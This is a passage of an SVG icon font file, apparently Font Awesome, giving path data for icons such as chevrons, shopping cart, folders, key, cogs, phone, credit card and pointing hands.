d="M164.1 288h-152.1c-6.59961 0 -12 5.40039 -12 12v80c0 19.9004 16.0996 36 36 36h104c19.9004 0 36 -16.0996 36 -36v-80c0.0996094 -6.59961 -5.2998 -12 -11.9004 -12zM512.1 300c0 -6.59961 -5.39941 -12 -12 -11.9004h-152c-6.59961 0 -12 5.40039 -12 12v80
c0 19.9004 16.1006 36 36 36h104c19.9004 0 36 -16.0996 36 -36v-80.0996zM348.1 256h151.9c6.7002 0 12 -5.40039 12 -12.0996c-0.200195 -20.2002 -0.599609 -40.4004 0 -53.2002c0 -150.7 -134.5 -246.7 -255.1 -246.7c-120.601 0 -256.801 96 -256.801 246.6
c0.600586 13 0.100586 31.9004 0 53.3008c0 6.69922 5.30078 12.0996 12 12.0996h152c6.60059 0 12 -5.40039 12 -12v-52c0 -127.9 160 -128.1 160 0v52c0 6.59961 5.40039 12 12 12z" />
    <glyph glyph-name="chevron-up" unicode="&#xf077;" horiz-adv-x="448" 
d="M240.971 317.476l194.344 -194.343c9.37207 -9.37305 9.37207 -24.5684 0 -33.9404l-22.667 -22.667c-9.35742 -9.35742 -24.5225 -9.375 -33.9014 -0.0400391l-154.746 154.02l-154.745 -154.021c-9.37891 -9.33496 -24.5439 -9.31738 -33.9014 0.0400391
l-22.667 22.667c-9.37207 9.37305 -9.37207 24.5684 0 33.9404l194.344 194.343c9.37207 9.37305 24.5674 9.37305 33.9404 0.000976562z" />
    <glyph glyph-name="chevron-down" unicode="&#xf078;" horiz-adv-x="447" 
d="M207.029 66.5244l-194.344 194.344c-9.37207 9.37305 -9.37207 24.5684 0 33.9404l22.667 22.667c9.35742 9.35742 24.5225 9.375 33.9014 0.0400391l154.746 -154.021l154.745 154.021c9.37891 9.33496 24.5439 9.31738 33.9014 -0.0400391l22.667 -22.667
c9.37207 -9.37305 9.37207 -24.5684 0 -33.9404l-194.343 -194.344c-9.37305 -9.37207 -24.5684 -9.37207 -33.9414 0z" />
    <glyph glyph-name="retweet" unicode="&#xf079;" horiz-adv-x="640" 
d="M629.657 104.402l-100.687 -100.687c-9.37305 -9.37207 -24.5674 -9.37207 -33.9404 0l-100.688 100.687c-9.37305 9.37305 -9.37305 24.5684 0 33.9404l10.8232 10.8232c9.56152 9.56152 25.1328 9.33984 34.4189 -0.492188l40.415 -42.792v182.118h-187.549
c-5.4873 0 -13.0908 3.14941 -16.9707 7.0293l-16 16c-15.1191 15.1201 -4.41113 40.9707 16.9707 40.9707h243.549c13.2549 0 24 -10.7451 24 -24v-222.118l40.416 42.792c9.28516 9.83105 24.8564 10.0537 34.4189 0.492188l10.8232 -10.8232
c9.37207 -9.37207 9.37207 -24.5684 -0.000976562 -33.9404zM364.519 88.9707l16.001 -16c15.1191 -15.1201 4.41113 -40.9707 -16.9707 -40.9707h-243.549c-13.2549 0 -24 10.7451 -24 24v222.119l-40.416 -42.793c-9.28613 -9.83105 -24.8574 -10.0527 -34.4189 -0.491211
l-10.8223 10.8223c-9.37305 9.37207 -9.37305 24.5674 0 33.9404l100.688 100.687c9.37207 9.37305 24.5674 9.37305 33.9404 0l100.687 -100.686c9.37305 -9.37207 9.37305 -24.5674 0 -33.9404l-10.8223 -10.8223c-9.5625 -9.5625 -25.1328 -9.33984 -34.4189 0.491211
l-40.416 42.792v-182.119h187.548h0.000976562c5.4873 0 13.0898 -3.14941 16.9697 -7.0293z" />
    <glyph glyph-name="shopping-cart" unicode="&#xf07a;" horiz-adv-x="575" 
d="M528.12 146.681c-2.4834 -10.9268 -12.1973 -18.6807 -23.4033 -18.6807h-293.145l6.54492 -32h268.418c15.4004 0 26.8154 -14.3008 23.4033 -29.3193l-5.51758 -24.2754c18.6914 -9.07324 31.5791 -28.2334 31.5791 -50.4053c0 -30.9277 -25.0723 -56 -56 -56
s-56 25.0723 -56 56c0 15.6738 6.44727 29.835 16.8232 40h-209.647c10.377 -10.165 16.8242 -24.3262 16.8242 -40c0 -30.9277 -25.0723 -56 -56 -56s-56 25.0723 -56 56c0 20.7783 11.3252 38.9004 28.1309 48.5654l-70.248 343.435h-69.8828
c-13.2549 0 -24 10.7451 -24 24v16c0 13.2549 10.7451 24 24 24h102.529c11.4004 0 21.2285 -8.02148 23.5127 -19.1904l9.16602 -44.8096h392.782c15.4004 0 26.8154 -14.3008 23.4023 -29.3193z" />
    <glyph glyph-name="folder" unicode="&#xf07b;" 
d="M464 320c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h160l64 -64h192z" />
    <glyph glyph-name="folder-open" unicode="&#xf07c;" horiz-adv-x="576" 
d="M572.694 155.907l-72.4248 -124.155c-10.2236 -17.5273 -34.9883 -31.752 -55.2793 -31.752h-0.000976562h-399.964c-18.5234 0 -30.0645 20.0928 -20.7314 36.0928l72.4238 124.155c10.2246 17.5273 34.9902 31.752 55.2822 31.752v0h399.964
c18.5234 0 30.0645 -20.0928 20.7305 -36.0928zM152 224c-34.0107 0 -65.7861 -18.25 -82.9229 -47.6279l-69.0771 -118.418v278.046c0 26.5098 21.4902 48 48 48h160l64 -64h160c26.5098 0 48 -21.4902 48 -48v-48h-328z" />
    <glyph glyph-name="chart-bar" unicode="&#xf080;" 
d="M332.8 128c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v134.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h38.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-134.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-38.4004zM428.8 128
c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v230.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h38.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-230.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-38.4004zM140.8 128
c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v70.4004c0 6.39941 6.40039 12.7998 12.7998 12.7998h38.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-70.4004c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-38.4004zM236.8 128
c-6.39941 0 -12.7998 6.40039 -12.7998 12.7998v198.4c0 6.39941 6.40039 12.7998 12.7998 12.7998h38.4004c6.39941 0 12.7998 -6.40039 12.7998 -12.7998v-198.4c0 -6.39941 -6.40039 -12.7998 -12.7998 -12.7998h-38.4004zM496 64c8.83984 0 16 -7.16016 16 -16v-32
c0 -8.83984 -7.16016 -16 -16 -16h-464c-17.6699 0 -32 14.3301 -32 32v336c0 8.83984 7.16016 16 16 16h32c8.83984 0 16 -7.16016 16 -16v-304h432z" />
    <glyph glyph-name="camera-retro" unicode="&#xf083;" 
d="M48 416h416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48zM48 384c-8.7998 0 -16 -7.2002 -16 -16v-10c0 -3.2998 2.7002 -6 6 -6h116c3.2998 0 6 2.7002 6 6v20c0 3.2998 -2.7002 6 -6 6h-106z
M474 288c3.2998 0 6 2.7002 6 6v74c0 8.7998 -7.2002 16 -16 16h-252.8c-2 0 -3.90039 -1 -5 -2.7002l-30.2002 -45.2998h-138c-3.2998 0 -6 -2.7002 -6 -6v-36c0 -3.2998 2.7002 -6 6 -6h436zM256 24c66.2002 0 120 53.7998 120 120s-53.7998 120 -120 120
s-120 -53.7998 -120 -120s53.7998 -120 120 -120zM256 232c48.5 0 88 -39.5 88 -88s-39.5 -88 -88 -88s-88 39.5 -88 88s39.5 88 88 88zM208 128c8.7998 0 16 7.2002 16 16c0 17.5996 14.4004 32 32 32c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16
c-35.2998 0 -64 -28.7002 -64 -64c0 -8.7998 7.2002 -16 16 -16z" />
    <glyph glyph-name="key" unicode="&#xf084;" 
d="M512 271.999c0 -97.2021 -78.7979 -175.999 -176 -175.999c-11.2197 0 -22.1904 1.06152 -32.8271 3.06934l-24.0117 -27.0146c-3.95215 -4.44629 -11.9883 -8.05469 -17.9375 -8.05469h-0.000976562h-37.2227v-40c0 -13.2549 -10.7451 -24 -24 -24h-40v-40
c0 -13.2549 -10.7451 -24 -24 -24h-112c-13.2549 0 -24 10.7451 -24 24v78.0586c0 6.36523 2.5293 12.4707 7.0293 16.9717l161.802 161.802c-5.72266 17.3535 -8.83105 35.8965 -8.83105 55.168c0 97.2021 78.7969 175.999 175.999 176
c97.4893 0.000976562 176.001 -78.5107 176.001 -176.001zM336 320c0 -26.5098 21.4902 -48 48 -48s48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48z" />
    <glyph glyph-name="cogs" unicode="&#xf085;" horiz-adv-x="639" 
d="M512.1 257l-8.19922 -14.2998c-3 -5.2998 -9.40039 -7.5 -15.1006 -5.40039c-11.7998 4.40039 -22.5996 10.7002 -32.0996 18.6006c-4.60059 3.7998 -5.7998 10.5 -2.7998 15.6992l8.19922 14.3008c-6.89941 8 -12.2998 17.2998 -15.8994 27.3994h-16.5
c-6 0 -11.2002 4.2998 -12.2002 10.2998c-2 12 -2.09961 24.6006 0 37.1006c1 6 6.2002 10.3994 12.2002 10.3994h16.5c3.59961 10.1006 9 19.4004 15.8994 27.4004l-8.19922 14.2998c-3 5.2002 -1.90039 11.9004 2.7998 15.7002
c9.5 7.90039 20.3994 14.2002 32.0996 18.5996c5.7002 2.10059 12.1006 -0.0996094 15.1006 -5.39941l8.19922 -14.2998c10.5 1.89941 21.2002 1.89941 31.7002 0l8.2002 14.2998c3 5.2998 9.40039 7.5 15.0996 5.39941c11.8008 -4.39941 22.6006 -10.6992 32.1006 -18.5996
c4.59961 -3.7998 5.7998 -10.5 2.7998 -15.7002l-8.2002 -14.2998c6.90039 -8 12.2998 -17.2998 15.9004 -27.4004h16.5c6 0 11.2002 -4.2998 12.2002 -10.2998c2 -12 2.09961 -24.5996 0 -37.0996c-1 -6 -6.2002 -10.4004 -12.2002 -10.4004h-16.5
c-3.60059 -10.0996 -9 -19.3994 -15.9004 -27.3994l8.2002 -14.3008c3 -5.19922 1.90039 -11.8994 -2.7998 -15.6992c-9.5 -7.90039 -20.4004 -14.2002 -32.1006 -18.6006c-5.69922 -2.09961 -12.0996 0.100586 -15.0996 5.40039l-8.2002 14.2998
c-10.3994 -1.90039 -21.2002 -1.90039 -31.7002 0zM501.6 315.8c38.5 -29.5996 82.4004 14.2998 52.8008 52.7998c-38.5 29.7002 -82.4004 -14.2998 -52.8008 -52.7998zM386.3 161.9l33.7002 -16.8008c10.0996 -5.7998 14.5 -18.0996 10.5 -29.0996
c-8.90039 -24.2002 -26.4004 -46.4004 -42.5996 -65.7998c-7.40039 -8.90039 -20.2002 -11.1006 -30.3008 -5.2998l-29.0996 16.7998c-16 -13.7002 -34.5996 -24.6006 -54.9004 -31.7002v-33.5996c0 -11.6006 -8.2998 -21.6006 -19.6992 -23.6006
c-24.6006 -4.2002 -50.4004 -4.39941 -75.9004 0c-11.5 2 -20 11.9004 -20 23.6006v33.5996c-20.2998 7.2002 -38.9004 18 -54.9004 31.7002l-29.0996 -16.7002c-10 -5.7998 -22.9004 -3.59961 -30.2998 5.2998c-16.2002 19.4004 -33.2998 41.6006 -42.2002 65.7002
c-4 10.9004 0.400391 23.2002 10.5 29.0996l33.2998 16.8008c-3.89941 20.8994 -3.89941 42.3994 0 63.3994l-33.2998 16.9004c-10.0996 5.7998 -14.5996 18.0996 -10.5 29c8.90039 24.2002 26 46.3994 42.2002 65.7998c7.39941 8.90039 20.2002 11.0996 30.2998 5.2998
l29.0996 -16.7998c16 13.7002 34.6006 24.5996 54.9004 31.7002v33.7002c0 11.5 8.2002 21.5 19.5996 23.5c24.6006 4.19922 50.5 4.39941 76 0.0996094c11.5 -2 20 -11.9004 20 -23.5996v-33.6006c20.3008 -7.2002 38.9004 -18 54.9004 -31.7002l29.0996 16.8008
c10 5.7998 22.9004 3.59961 30.3008 -5.30078c16.1992 -19.3994 33.1992 -41.5996 42.0996 -65.7998c4 -10.8994 0.0996094 -23.2002 -10 -29.0996l-33.7002 -16.7998c3.90039 -21 3.90039 -42.5 0 -63.5zM268.7 140.8c59.2002 77 -28.7002 164.9 -105.7 105.7
c-59.2002 -77 28.7002 -164.9 105.7 -105.7zM512.1 -41.9004l-8.19922 -14.2998c-3 -5.2998 -9.40039 -7.5 -15.1006 -5.39941c-11.7998 4.39941 -22.5996 10.6992 -32.0996 18.5996c-4.60059 3.7998 -5.7998 10.5 -2.7998 15.7002l8.19922 14.2998
c-6.89941 8 -12.2998 17.2998 -15.8994 27.4004h-16.5c-6 0 -11.2002 4.2998 -12.2002 10.2998c-2 12 -2.09961 24.5996 0 37.0996c1 6 6.2002 10.4004 12.2002 10.4004h16.5c3.59961 10.0996 9 19.3994 15.8994 27.3994l-8.19922 14.3008
c-3 5.19922 -1.90039 11.8994 2.7998 15.6992c9.5 7.90039 20.3994 14.2002 32.0996 18.6006c5.7002 2.09961 12.1006 -0.100586 15.1006 -5.40039l8.19922 -14.2998c10.5 1.90039 21.2002 1.90039 31.7002 0l8.2002 14.2998c3 5.2998 9.40039 7.5 15.0996 5.40039
c11.8008 -4.40039 22.6006 -10.7002 32.1006 -18.6006c4.59961 -3.7998 5.7998 -10.5 2.7998 -15.6992l-8.2002 -14.3008c6.90039 -8 12.2998 -17.2998 15.9004 -27.3994h16.5c6 0 11.2002 -4.2998 12.2002 -10.2998c2 -12 2.09961 -24.6006 0 -37.1006
c-1 -6 -6.2002 -10.3994 -12.2002 -10.3994h-16.5c-3.60059 -10.1006 -9 -19.4004 -15.9004 -27.4004l8.2002 -14.2998c3 -5.2002 1.90039 -11.9004 -2.7998 -15.7002c-9.5 -7.90039 -20.4004 -14.2002 -32.1006 -18.5996
c-5.69922 -2.10059 -12.0996 0.0996094 -15.0996 5.39941l-8.2002 14.2998c-10.3994 -1.89941 -21.2002 -1.89941 -31.7002 0zM501.6 17c38.5 -29.5996 82.4004 14.2998 52.8008 52.7998c-38.5 29.6006 -82.4004 -14.2998 -52.8008 -52.7998z" />
    <glyph glyph-name="comments" unicode="&#xf086;" horiz-adv-x="576" 
d="M416 256c0 -88.4004 -93.0996 -160 -208 -160c-41 0 -79.0996 9.2998 -111.3 25c-21.7998 -12.7002 -52.1006 -25 -88.7002 -25c-3.2002 0 -6 1.7998 -7.2998 4.7998s-0.700195 6.40039 1.5 8.7002c0.299805 0.299805 22.3994 24.2998 35.7998 54.5
c-23.9004 26.0996 -38 57.7002 -38 92c0 88.4004 93.0996 160 208 160s208 -71.5996 208 -160zM538 36c13.4004 -30.2998 35.5 -54.2002 35.7998 -54.5c2.2002 -2.40039 2.7998 -5.7998 1.5 -8.7002c-1.2002 -2.89941 -4.09961 -4.7998 -7.2998 -4.7998
c-36.5996 0 -66.9004 12.2998 -88.7002 25c-32.2002 -15.7998 -70.2998 -25 -111.3 -25c-86.2002 0 -160.2 40.4004 -191.7 97.9004c10.4004 -1.10059 20.9004 -1.90039 31.7002 -1.90039c132.3 0 240 86.0996 240 192c0 6.7998 -0.400391 13.5 -1.2998 20.0996
c75.7998 -23.8994 129.3 -81.1992 129.3 -148.1c0 -34.2998 -14.0996 -66 -38 -92z" />
    <glyph glyph-name="star-half" unicode="&#xf089;" horiz-adv-x="308" 
d="M288 448v-439.6l-130.7 -68.6006c-23.3994 -12.2998 -50.8994 7.60059 -46.3994 33.7002l25 145.5l-105.7 103c-19 18.5 -8.5 50.7998 17.7002 54.5996l146.1 21.2002l65.2998 132.4c5.90039 11.8994 17.2998 17.7998 28.7002 17.7998z" />
    <glyph glyph-name="thumbtack" unicode="&#xf08d;" horiz-adv-x="384" 
d="M298.028 233.733c47.9893 -22.3135 85.9717 -62.5508 85.9727 -113.733c0 -13.2549 -10.7451 -24 -24 -24h-136v-104.007c0 -1.04297 -0.378906 -2.64551 -0.844727 -3.57812l-24 -48c-2.94727 -5.89258 -11.3701 -5.88184 -14.3115 0l-24 48
c-0.555664 1.11133 -0.844727 2.33594 -0.844727 3.57812v104.007h-136c-13.2549 0 -24 10.7451 -24 24c0 50.7393 37.4648 91.1797 85.9717 113.733l12.2354 118.267h-42.207c-13.2549 0 -24 10.7451 -24 24v48c0 13.2549 10.7451 24 24 24h272
c13.2549 0 24 -10.7451 24 -24v-48c0 -13.2549 -10.7451 -24 -24 -24h-42.207z" />
    <glyph glyph-name="trophy" unicode="&#xf091;" horiz-adv-x="576" 
d="M552 384c13.2998 0 24 -10.7002 24 -24v-56c0 -35.7002 -22.5996 -72.4004 -61.9004 -100.7c-31.3994 -22.7002 -69.6992 -37.0996 -110 -41.7002c-31.3994 -52.0996 -68.0996 -73.5996 -68.0996 -73.5996v-72h48c35.2998 0 64 -20.7002 64 -56v-12
c0 -6.59961 -5.40039 -12 -12 -12h-296c-6.59961 0 -12 5.40039 -12 12v12c0 35.2998 28.7002 56 64 56h48v72s-36.7002 21.5 -68.0996 73.5996c-40.2002 4.60059 -78.5 19 -110 41.7002c-39.4004 28.2998 -61.9004 65 -61.9004 100.7v56c0 13.2998 10.7002 24 24 24h104v40
c0 13.2998 10.7002 24 24 24h272c13.2998 0 24 -10.7002 24 -24v-40h104zM99.2998 255.2c12.5 -9 26.6006 -16.2002 41.7002 -21.4004c-7 25 -11.7998 53.6006 -12.7998 86.2002h-64.2002v-16c0 -11.5996 10.9004 -31.2002 35.2998 -48.7998zM512 304v16h-64.2998
c-1 -32.5996 -5.7998 -61.2002 -12.7998 -86.2002c15.0996 5.2002 29.2998 12.4004 41.7998 21.4004c17.5996 12.7002 35.2998 32.7002 35.2998 48.7998z" />
    <glyph glyph-name="upload" unicode="&#xf093;" 
d="M296 64h-80c-13.2998 0 -24 10.7002 -24 24v168h-87.7002c-17.7998 0 -26.7002 21.5 -14.0996 34.0996l152.1 152.2c7.5 7.5 19.7998 7.5 27.2998 0l152.2 -152.2c12.6006 -12.5996 3.7002 -34.0996 -14.0996 -34.0996h-87.7002v-168c0 -13.2998 -10.7002 -24 -24 -24z
M512 72v-112c0 -13.2998 -10.7002 -24 -24 -24h-464c-13.2998 0 -24 10.7002 -24 24v112c0 13.2998 10.7002 24 24 24h136v-8c0 -30.9004 25.0996 -56 56 -56h80c30.9004 0 56 25.0996 56 56v8h136c13.2998 0 24 -10.7002 24 -24zM388 -16c0 11 -9 20 -20 20s-20 -9 -20 -20
s9 -20 20 -20s20 9 20 20zM452 -16c0 11 -9 20 -20 20s-20 -9 -20 -20s9 -20 20 -20s20 9 20 20z" />
    <glyph glyph-name="lemon" unicode="&#xf094;" 
d="M489.038 425.037c23.0938 -23.0938 28.8916 -54.3906 16.833 -75.0928c-34.3115 -58.9043 53.0762 -181.249 -86.7461 -321.071s-262.167 -52.4326 -321.068 -86.7432c-20.7031 -12.0586 -52 -6.2627 -75.0947 16.832c-23.0928 23.0938 -28.8916 54.3906 -16.833 75.0928
c34.3125 58.9043 -53.0781 181.247 86.7451 321.07s262.167 52.4336 321.073 86.7461c20.7012 12.0586 51.9971 6.25879 75.0908 -16.834zM243.881 352.478c8.57227 2.14355 13.7832 10.8291 11.6416 19.4023c-2.14258 8.57324 -10.8281 13.7852 -19.4033 11.6426
c-69.8027 -17.4521 -154.218 -101.949 -171.643 -171.643c-2.1416 -8.57324 3.07031 -17.2588 11.6426 -19.4033c1.30273 -0.324219 2.6084 -0.480469 3.89258 -0.480469c7.16895 0 13.6943 4.85352 15.5117 12.124c14.5498 58.2031 90.1689 133.811 148.357 148.357z" />
    <glyph glyph-name="phone" unicode="&#xf095;" 
d="M493.4 423.4c10.8994 -2.5 18.5996 -12.2002 18.5996 -23.4004c0 -256.5 -207.9 -464 -464 -464c-11.2998 0 -20.9004 7.7998 -23.4004 18.5996l-24 104c-2.59961 11.3008 3.30078 22.9004 14 27.6006l112 48c9.80078 4.2002 21.2002 1.39941 28 -6.90039
l49.6006 -60.5996c78.2998 36.7002 141.2 100.5 177.2 177.2l-60.6006 49.5996c-8.2998 6.7002 -11.0996 18.2002 -6.89941 28l48 112c4.59961 10.5996 16.1992 16.5 27.5 13.9004z" />
    <glyph glyph-name="phone-square" unicode="&#xf098;" horiz-adv-x="448" 
d="M400 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352zM94 32c160.055 0 290 129.708 290 290v0c0 6.58691 -5.20898 13.1338 -11.6279 14.6143l-65 14.998
c-0.918945 0.211914 -2.42969 0.383789 -3.37305 0.383789c-5.45996 0 -11.6367 -4.07324 -13.7871 -9.09082l-30 -69.998c-0.668945 -1.5625 -1.21191 -4.20898 -1.21191 -5.9082c0 -3.92383 2.46387 -9.125 5.50098 -11.6104l37.8857 -30.9971
c-22.4834 -47.9219 -61.8369 -87.8164 -110.78 -110.779l-30.9971 37.8848c-2.48535 3.03711 -7.68652 5.50195 -11.6104 5.50195c-1.69922 0 -4.3457 -0.543945 -5.9082 -1.21289l-69.998 -29.999c-5.01855 -2.15039 -9.09082 -8.32715 -9.09082 -13.7871
c0 -0.943359 0.171875 -2.4541 0.383789 -3.37305l14.998 -65c1.55957 -6.75391 7.58301 -11.627 14.6162 -11.627z" />
    <glyph glyph-name="unlock" unicode="&#xf09c;" horiz-adv-x="448" 
d="M400 192c26.5 0 48 -21.5 48 -48v-160c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v160c0 26.5 21.5 48 48 48h24v102.5c0 84 67.5 153.2 151.5 153.5s152.5 -68 152.5 -152v-16c0 -13.2998 -10.7002 -24 -24 -24h-32c-13.2998 0 -24 10.7002 -24 24v16
c0 39.9004 -32.7002 72.4004 -72.7002 72c-39.5996 -0.400391 -71.2998 -33.2998 -71.2998 -72.9004v-103.1h248z" />
    <glyph glyph-name="credit-card" unicode="&#xf09d;" horiz-adv-x="576" 
d="M0 16v176h576v-176c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48zM192 84v-40c0 -6.59961 5.40039 -12 12 -12h136c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-136c-6.59961 0 -12 -5.40039 -12 -12zM64 84v-40
c0 -6.59961 5.40039 -12 12 -12h72c6.59961 0 12 5.40039 12 12v40c0 6.59961 -5.40039 12 -12 12h-72c-6.59961 0 -12 -5.40039 -12 -12zM576 368v-48h-576v48c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48z" />
    <glyph glyph-name="rss" unicode="&#xf09e;" horiz-adv-x="448" 
d="M128.081 32.041c0 -35.3691 -28.6719 -64.041 -64.041 -64.041s-64.04 28.6719 -64.04 64.041s28.6719 64.041 64.041 64.041s64.04 -28.6729 64.04 -64.041zM303.741 -15.209c0.494141 -9.13477 -6.84668 -16.791 -15.9951 -16.79h-48.0693
c-8.41406 0 -15.4707 6.49023 -16.0176 14.8867c-7.29883 112.07 -96.9404 201.488 -208.772 208.772c-8.39648 0.545898 -14.8867 7.60254 -14.8867 16.0176v48.0693c0 9.14746 7.65625 16.4883 16.791 15.9941c154.765 -8.36328 278.596 -132.351 286.95 -286.95z
M447.99 -15.4971c0.324219 -9.03027 -6.97168 -16.5029 -16.0049 -16.5039h-48.0684c-8.62598 0 -15.6455 6.83496 -15.999 15.4531c-7.83789 191.148 -161.286 344.626 -352.465 352.465c-8.61816 0.354492 -15.4531 7.37402 -15.4531 15.999v48.0684
c0 9.03418 7.47266 16.3301 16.5029 16.0059c234.962 -8.43555 423.093 -197.667 431.487 -431.487z" />
    <glyph glyph-name="hdd" unicode="&#xf0a0;" horiz-adv-x="576" 
d="M576 144v-96c0 -26.5098 -21.4902 -48 -48 -48h-480c-26.5098 0 -48 21.4902 -48 48v96c0 26.5098 21.4902 48 48 48h480c26.5098 0 48 -21.4902 48 -48zM528 224h-480h-0.0693359c-8.81738 0 -22.5742 -2.76172 -30.708 -6.16504l96.5283 144.791
c7.86621 11.7988 25.7578 21.374 39.9385 21.374h268.621c14.1807 0 32.0732 -9.57617 39.9395 -21.374l96.5273 -144.791c-8.13379 3.40332 -21.8906 6.16504 -30.708 6.16504h-0.0693359zM480 128c-17.6729 0 -32 -14.3271 -32 -32s14.3271 -32 32 -32s32 14.3271 32 32
s-14.3271 32 -32 32zM384 128c-17.6729 0 -32 -14.3271 -32 -32s14.3271 -32 32 -32s32 14.3271 32 32s-14.3271 32 -32 32z" />
    <glyph glyph-name="bullhorn" unicode="&#xf0a1;" horiz-adv-x="576" 
d="M576 208c0 -23.6299 -12.9502 -44.04 -32.0098 -55.1299v-152.87c0 -9.21973 -7.08008 -32 -32 -32c-6.19336 0.00585938 -15.1445 3.15039 -19.9805 7.01953l-85.0293 68.0303c-42.7002 34.1406 -96.3203 52.9502 -150.98 52.9502h-28.0801
c-2.79004 -10.21 -4.41016 -20.8896 -4.41016 -32c0 -29.0801 9.75 -55.9199 26.1504 -77.4404c15.79 -20.7197 0.149414 -50.5596 -25.9004 -50.5596h-74.2793c-11.8809 0 -23.2109 6.37012 -28.4004 17.0596c-16.2998 33.5908 -25.5605 71.1709 -25.5605 110.94
c0 10.8604 0.790039 21.5195 2.18066 32h-33.7002c-35.3496 0 -64 28.6504 -64 64v96c0 35.3496 28.6504 64 64 64h192c54.6602 0 108.28 18.8096 150.99 52.9502l85.0293 68.0303c5.79004 4.63965 12.8604 7.01953 19.9805 7.01953c25.0195 0 32 -23.2598 32 -32.0098
v-152.87c19.0498 -11.0801 32 -31.4902 32 -55.1201zM480 66.5801v282.84l-33.0498 -26.4395c-54 -43.2002 -121.83 -66.9805 -190.95 -66.9805v-96c69.1201 0 136.95 -23.7803 190.95 -66.9805z" />
    <glyph glyph-name="certificate" unicode="&#xf0a3;" horiz-adv-x="511" 
d="M458.622 192.08l45.9844 -45.0039c13.7012 -12.9727 7.32227 -36.0371 -10.6641 -40.3389l-62.6504 -15.9902l17.6611 -62.0146c4.99023 -17.834 -11.8252 -34.665 -29.6611 -29.6719l-61.9941 17.667l-15.9834 -62.6709
c-4.33887 -18.1533 -27.8252 -24.1553 -40.3252 -10.668l-44.9893 46.001l-44.9912 -46.001c-12.6289 -13.3496 -35.8857 -7.90625 -40.3252 10.668l-15.9834 62.6709l-61.9941 -17.667c-17.832 -4.99121 -34.6523 11.833 -29.6611 29.6719l17.6611 62.0146
l-62.6504 15.9902c-17.9795 4.2998 -24.3721 27.3613 -10.6641 40.3389l45.9854 45.0039l-45.9854 45.0049c-13.7012 12.9707 -7.32227 36.0371 10.665 40.3379l62.6504 15.9902l-17.6611 62.0146c-4.99023 17.834 11.8242 34.665 29.6611 29.6709l61.9951 -17.667
l15.9834 62.6709c4.27832 17.9023 27.6953 24.0195 40.3252 10.6689l44.9893 -46.3418l44.9902 46.3428c12.7744 13.5039 36.0947 7.03027 40.3252 -10.6689l15.9834 -62.6709l61.9941 17.667c17.832 4.99219 34.6523 -11.833 29.6611 -29.6709l-17.6611 -62.0146
l62.6504 -15.9902c17.9795 -4.2998 24.3721 -27.3623 10.6641 -40.3389z" />
    <glyph glyph-name="hand-point-right" unicode="&#xf0a4;" 
d="M512 248.348c0 -23.625 -20.6504 -43.8252 -44.7998 -43.8252h-99.8516c16.3408 -17.0488 18.3467 -49.7666 -6.29883 -70.9443c14.2881 -22.8291 2.14746 -53.0176 -16.4502 -62.3154c8.97461 -49.1406 -21.9453 -71.2627 -72.5996 -71.2627
c-2.74609 0 -13.2764 0.203125 -16 0.195312c-61.9707 -0.167969 -76.8936 31.0645 -123.731 38.3145c-11.6729 1.80762 -20.2686 11.8916 -20.2686 23.7041v171.525l0.00195312 0.000976562c0.0107422 18.3662 10.6074 35.8887 28.4639 43.8447
c28.8857 12.9941 95.4131 49.0381 107.534 77.3232c7.79688 18.1934 21.3838 29.084 40 29.0918c34.2217 0.0136719 57.752 -35.0977 44.1191 -66.9082c-3.58301 -8.3584 -8.3125 -16.6699 -14.1533 -24.918h149.234c23.4502 0 44.7998 -20.543 44.7998 -43.8262zM96 248
v-192c0 -13.2549 -10.7451 -24 -24 -24h-48c-13.2549 0 -24 10.7451 -24 24v192c0 13.2549 10.7451 24 24 24h48c13.2549 0 24 -10.7451 24 -24zM68 80c0 11.0459 -8.9541 20 -20 20s-20 -8.9541 -20 -20s8.9541 -20 20 -20s20 8.9541 20 20z" />
    <glyph glyph-name="hand-point-left" unicode="&#xf0a5;" 
d="M44.7998 292.174h149.234c-5.84082 8.24805 -10.5703 16.5586 -14.1533 24.918c-13.6328 31.8105 9.89746 66.9219 44.1191 66.9082c18.6162 -0.0078125 32.2031 -10.8975 40 -29.0918c12.1221 -28.2861 78.6484 -64.3291 107.534 -77.3232
c17.8564 -7.95605 28.4531 -25.4785 28.4639 -43.8447l0.00195312 -0.000976562v-171.526c0 -11.8115 -8.5957 -21.8965 -20.2686 -23.7031c-46.8379 -7.25 -61.7607 -38.4824 -123.731 -38.3145c-2.72363 0.00683594 -13.2539 -0.195312 -16 -0.195312
c-50.6543 0 -81.5742 22.1221 -72.5996 71.2627c-18.5977 9.29688 -30.7383 39.4863 -16.4502 62.3154c-24.6455 21.1768 -22.6396 53.8955 -6.29883 70.9443h-99.8516c-24.1494 0 -44.7998 20.2002 -44.7998 43.8252c0 23.2832 21.3496 43.8262 44.7998 43.8262zM440 272
h48c13.2549 0 24 -10.7451 24 -24v-192c0 -13.2549 -10.7451 -24 -24 -24h-48c-13.2549 0 -24 10.7451 -24 24v192c0 13.2549 10.7451 24 24 24zM464 60c11.0459 0 20 8.9541 20 20s-8.9541 20 -20 20s-20 -8.9541 -20 -20s8.9541 -20 20 -20z" />
